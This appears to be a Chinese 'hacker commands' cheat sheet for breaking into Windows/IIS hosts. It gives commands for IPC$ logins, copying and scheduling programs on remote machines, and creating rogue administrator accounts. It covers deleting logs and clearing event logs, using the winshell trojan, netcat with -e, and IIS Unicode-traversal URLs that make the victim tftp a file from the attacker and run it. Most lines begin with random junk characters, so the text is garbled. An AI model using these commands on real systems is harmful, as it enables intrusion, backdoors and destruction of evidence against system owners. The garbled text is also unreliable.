网管和黑客都必须知道的命令
HwU \[f 常用的几条NET命令:
$wN'mY sp_(j!]jX (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
"r"Y9KODm <EBp X (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
];uvE? 55 h+Q== (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
d9Q%GG0] 8<]> q (查看远程主机时间) net time \\IP地址
R8],}6,;E} 'kh%^_FH7 (定时启动某个程序) at \\IP地址 02:18 readme.exe
cOUO_xp( siD Sm (查看共享) net view \\IP地址
" jeJV,% ?<nz2 piP, (查看netbios工作组列表) nbtstat -A IP地址
Upv2s:wa}z a#raUF7e (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
zZf#E@=$| we} sC, (这两条把自己增加到管理员组): net user 用户名 密码 /add
S>"dUM DG:=E/ @ net localgroup Administrators 用户名 /add
o_5|L9 Vm6^'1CY (断开连接) net use \\IP地址\ipc$ /delete
}XXE
hOO _O rE{ 扫尾:
EI_J7J+ J@Orrz2q# del C:\winnt\system32\logfiles\*.*
|/<iydP N7;E 2 X del C:\winnt\ssytem32\config\*.evt
D:F!;n9 u{3KV6MS del C:\winnt\system32\dtclog\*.*
#Kh`ATme
V!Joh5=a del C:\winnt\system32\*.log
bu hxC5i% d@w
I:
7 del C:\winnt\system32\*.txt
B[$SA-ZHi F_21`Hj del C:\winnt\*.txt
5o72X k '8Gw{&& del C:\winnt\*.log
t6"4+:c!> =k8A7P 一、netsvc.exe
/z'j:~`E S3=J1R, 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
ILVbbC`D ZU@V]+ww netsvc /list \\IP地址
!l\pwfXP&% P `oR-D netsvc schedule \\IP地址 /query
.K93VTzy jxoEOEA netsvc \\IP地址 schedule /start
# / 4Wcz< \agC Q& 二、OpenTelnet.exe
^Gyl:hN Th8Q~*v 远程启动主机的Telnet服务,并绑定端口到7878,例如:
x``!t>)O 1rKR=To OpenTelnet \\IP地址 用户名 密码 1 7878
P9'5=e@jB ;zOZu~Q|' 然后就可以telnet到主机的7878端口,进入DOS方式下:
3gM{lS}h# \.{JS>! telnet IP地址 7878
81n%2G :#L B}=HQ 三、winshell.exe
'0=U+Egp 8jZYy! 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
MVj@0W33m *\`C!r p Path (查看winshell主程序的路径信息)
|'J3"am' iIT<{m&` b reBoot (重新启动机器)
\Dc\H) p<+]+,|\~: d shutDown (关闭机器)
V|D;7 fg9sZ%67]\ s Shell (执行后你就会看到可爱的“C:\>”)
0N}5sF m=K XMX x eXit (退出本次登录会话,此命令并不终止winshell的运行)
.d fTv/n f^]AyU;F: CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
*p-Fn$7\n I)x:NF6JO 四、3389登陆器,GUI方式登录远程主机的
;z?XT\C$ <hea%6 五、elsave.exe
b^xf,`D i~.[iZf| 事件日志清除工具
@U)'UrNr~ }n.h)Oz elsave -s \\IP地址 -l "application" -C
T'V(%\w -Z Z$
1E elsave -s \\IP地址 -l "system" -C
izKk@{Md 7Y)wu$!7} elsave -s \\IP地址 -l "security" -C
-3V~YhG :b>|U"ux 执行后成功清除应用程序日志,系统日志,安全日志
EK'&S=] cU>&E*wD 六、hbulot.exe
H )}WWXK Z^|C~lp;n 开启win2kserver和winxp的3389服务
e!8_3BE <_>6a7ra hbulot [/r]
J'EK5=H EH3G|3^xz 使用/r表示安装完成后自动重起目标使设置生效。
g IKm
@b/2' 七、nc.exe(netcat.exe)
9JtvHUkO KFhn}C3
i 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
GlZ9k-ZRF =gn}_sKNE 想要连接到某处: nc [-options] hostname port[s] [ports] ...
Jv<)/Km` >SJ$41"E 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
S3'g(+S ;?!rpj 参数:
{|gJC>f@ s,v#lJ]d0W -e prog 程序重定向,一旦连接,就执行 [危险!!]
rrWk&;? 6'ZnyWb -g gateway source-routing hop point[s], up to 8
v6VhXV6$| *N r|G61 -G num source-routing pointer: 4, 8, 12, ...
kn"x[{d wUeOD.;#F -h 帮助信息
nnNg^<[k3 #[W[|m -i secs 延时的间隔
iq:[+ C6M/$_l&a -l 监听模式,用于入站连接
LPn}QzH gk1S"H -n 指定数字的IP地址,不能用hostname
ehusI-q j*u9+. -o file 记录16进制的传输
55LF ug,|'<G+ -p port 本地端口号
Nj_sU0Dt
;"^9L -r 任意指定本地及远程端口
d-sh6q5 } XU:DE -s addr 本地源地址
*F*fH>?C# (VAL.v* -u UDP模式
[Be53U{= a.IF%hP0xo -v 详细输出——用两个-v可得到更详细的内容
.b`P! d`<^+p)oy -w secs timeout的时间
25n(&NV SWsv, -z 将输入输出关掉——用于扫描时
*.c9$`s 八、TFTPD32.EXE
B9Q.s nj0AO0 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
#(+HSZm _`{{39 F http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
!# :$u= DIp:S&q2 然后可以直接令文件运行:
0,$-)SkT ~:<@ ` http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
@1&;R N8YBu/ 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
&9_\E{o%] Z) i1?# 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
5%+bWI{w AV 5\W} 一、一 Xscan命令行运行参数说明:
XQJ^)d00h zO5u{ 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
_#D\*0J N3yB1_ 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
{/A)t1nL Y-3[KH D xscan -file <主机列表文件名> <检测项目> [其他选项]
;#yu"6{ 9X$#x90 其中<检测项目> 含义如下:
EcU'* )=E~CpKV -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
Dyk[ug5
X'#$e{ -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
r d6F"W (OyY_` -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
&[ u6oAR fAMD2C -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
!P~ PF:W~| t&9as} -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
qbU1qF/ :#\B {)( [其他选项] 含义如下:
|J<pLz hX8gV~E=y -v: 显示详细扫描进度
MLt'YW^ :PD`PgQ -p: 跳过Ping不通的主机
{yHB2=nI =(.mf -o: 跳过没有检测到开放端口的主机
up&N CX OY^n0Zof, -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10